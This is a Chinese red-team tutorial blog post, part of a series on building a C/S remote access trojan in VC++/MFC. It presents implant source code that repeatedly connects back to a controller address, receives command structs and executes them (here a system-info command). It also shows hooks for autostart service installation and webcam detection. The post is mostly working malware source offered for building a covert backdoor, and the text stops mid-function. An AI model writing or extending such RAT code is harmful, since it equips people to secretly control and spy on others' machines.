红队专题-从零开始VC++C/S远程控制软件RAT-MFC-[4]客户端与服务端连接

红队专题

• 招募六边形战士队员
• 服务端编写
• • 新建工程
  • server函数
  • 创建主线程类
  • • 获取配置信息
    • 运行
    • [command 命令](#command 命令)
    • 头文件里创建引用
    • [win32 类库/头文件](#win32 类库/头文件)
    • [startsocket 开始监听 类函数](#startsocket 开始监听 类函数)
    • • 添加类
      • StartSocket
      • mysend/myrecv
  • 设置
• m_sock
• [Common 头文件](#Common 头文件)
• • [MSGINFO_S 结构体](#MSGINFO_S 结构体)
• ThreadMain头文件
• [runflag 启动](#runflag 启动)

招募六边形战士队员

一起学习 代码审计、安全开发、web攻防、逆向等。。。

私信联系

服务端编写

新建工程

server函数

// FackExec_N0vv.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"


void Server();

void Server()
{
    CThreadMain Thread_Main;  // 主线程类  对象
    Thread_Main.GetInfo(); //获取配置信息
    /*if(Auto[1] == '1')
    {
        wcscpy_s(Thread_Main.MyServiceName,(wchar_t*)ServiceName);
    }*/
  // 增加自启动  服务名
    while(true)
    {
        if(Thread_Main.RunFlag == false)
        {
            break;
        }
        SOCKET sock;
        sock = Thread_Main.Run();
        Thread_Main.Command(sock);
    }
}

int _tmain(int argc, _TCHAR* argv[])
{
	Server();
	return 0;
}

创建主线程类

获取配置信息

 void CThreadMain::GetInfo()
{
    int Port = atoi(czPort);
    this->Time = atoi(czTime);
    this->SetupDir = atoi(czSetupDir);
    this->AutoFlag = atoi(czAuto);
}


用来生成配置文件

运行

 
SOCKET CThreadMain::Run()
{
    SOCKET sock;
    while(true)
    {
        sock = m_sock.StartSocket(this->Address);  // 连接远程主机  ip
        if(sock == NULL)
        {
            Sleep(this->Time * 1000);  //  等待60s
            printf("Sleep\n");
            continue;
        }
        else
        {
            break;
        }
    }
    return sock; 

}

command 命令

void CThreadMain::Command(SOCKET Sock)
{
    MSGINFO_S msg;
    m_Socket = Sock;
    while(1)
    {
        if(this->RunFlag == false)  // 程序是否可以运行
        {
            break;
        }
        memset(&msg,0,sizeof(MSGINFO_S));   //  消息结构体 清空
        if(m_sock.MyRecv(Sock,(char*)&msg,sizeof(MSGINFO_S))==0)   // 连接
        {
            break;
        }
        ExecCommand(msg,Sock);  // 执行命令
    }
    return;
}


void CThreadMain::ExecCommand(MSGINFO_S msg,SOCKET l_Socket)
{
    switch(msg.Msg_id)
        {
        case SYSINFO:
            {
                printf("GetSystemInfo\n");
                m_sys.SendSysinfo(l_Socket);
            }
            break;
        default:
            {
                printf("UnKnow Command\n");
                return;
            }
        }
}

头文件里创建引用

#pragma once

class CThreadMain
{
public:
	CThreadMain(void);
	~CThreadMain(void);
	void GetInfo();


private:
	
	SOCKET Run();
	void Command(SOCKET Sock);
	void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
};

win32 类库/头文件

#include <winsock2.h> stdafx.h中

头文件调用 stdafx.h

#pragma comment(lib,"ws2_32.lib")

#pragma comment(lib,"User32.lib")

#pragma comment(lib,"Advapi32.lib")

startsocket 开始监听 类函数

添加类

StartSocket

链接远程ip地址

SOCKET CMySocket::StartSocket(char Address[160])
{
    WSADATA data;
    WORD w=MAKEWORD(2,2);
    ::WSAStartup(w,&data);
    SOCKET s;
    s=::socket(AF_INET,SOCK_STREAM,0);
    sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(m_port);
    addr.sin_addr.S_un.S_addr = inet_addr(Address);
    if(::connect(s,(sockaddr*)&addr,sizeof(addr))==SOCKET_ERROR)
    {
        printf("Connect Error\n");
        DWORD e = GetLastError();
        printf("LastError:%d\n",e);
        s = NULL;
    }
    else
    {
        printf("Connect Success!\n");
    }
    return s;
}



SOCKET StartSocket(char Address[160])

mysend/myrecv

int CMySocket::MySend(SOCKET socket,const char* buf,int bytes)
{
	const char *b = buf;
	while(bytes > 0) 
	{ 
		int r = send(socket,b,bytes,0); 
		if(r < 0) 
		{
            printf("Socket_Error\n");
			return r; 
		} 
		else if(r == 0)
		{
            printf("Socket_Error\n");
			break;
		} 
		bytes -= r; 
		b += r; 
	} 
	return b - (char*)buf; 
}

int CMySocket::MyRecv(SOCKET socket,char* buf,int bytes)
{
    char *b = (char*)buf;
    while(bytes > 0)
    {
        int r = recv(socket,b,bytes,0);
        if(r < 0)
        {
            return 0;
        }
        else if(r == 0)
        {
            break;
        }
        bytes = bytes - r;
        b = b + r;
    }
    return b - (char*)buf;
}

#pragma once
#include "stdafx.h"

class CMySocket
{
public:
	CMySocket(void);
	~CMySocket(void);
	SOCKET StartSocket(char Address[160]);
	int MySend(SOCKET socket,const char* buf,int bytes);
	int MyRecv(SOCKET socket,char* buf,int bytes);
};

设置

m_sock

#pragma once

#include "stdafx.h"
#include "MySocket.h"

 

private: 
	void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
	CMySocket m_sock;
	char Address[160];
};

void CThreadMain::GetInfo()
{
    int Port = 1474;
    //this->Time = 60;
    //this->SetupDir = 0;
    //this->AutoFlag = 1;
	m_sock.m_port = Port;
	strcpy_s(Address,"127.0.0.1");

}

Common 头文件

头文件 新添加项

MSGINFO_S 结构体

#pragma once
#include <windows.h>
#define SYSINFO  0x01

typedef struct tagMSGINFO //传输消息结构体
{
    int Msg_id;
    BYTE context[1024*5];
}MSGINFO_S;

typedef struct tagSYSTEMINFO
{
    int os;
    bool Cam; //摄像头
    double ver;
}SYSTEMINFO_S;

ThreadMain头文件

#pragma once

#include "stdafx.h"
#include "MySocket.h"
#include "Common.h"

class CThreadMain
{
public:
	CThreadMain(void);
	~CThreadMain(void);
	void GetInfo();
	bool RunFlag;
	SOCKET Run();
	void Command(SOCKET Sock);

private:
	 
	void ExecCommand(MSGINFO_S msg,SOCKET l_Socket);
	CMySocket m_sock;
	char Address[160];
	SOCKET m_Socket;
	
};

runflag 启动

#include "stdafx.h"
#include "ThreadMain.h"
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib,"User32.lib")
#pragma comment(lib,"Advapi32.lib")


void Server();


void Server()
{

    CThreadMain Thread_Main;
	Thread_Main.RunFlag = true;
    Thread_Main.GetInfo(); //获取配置信息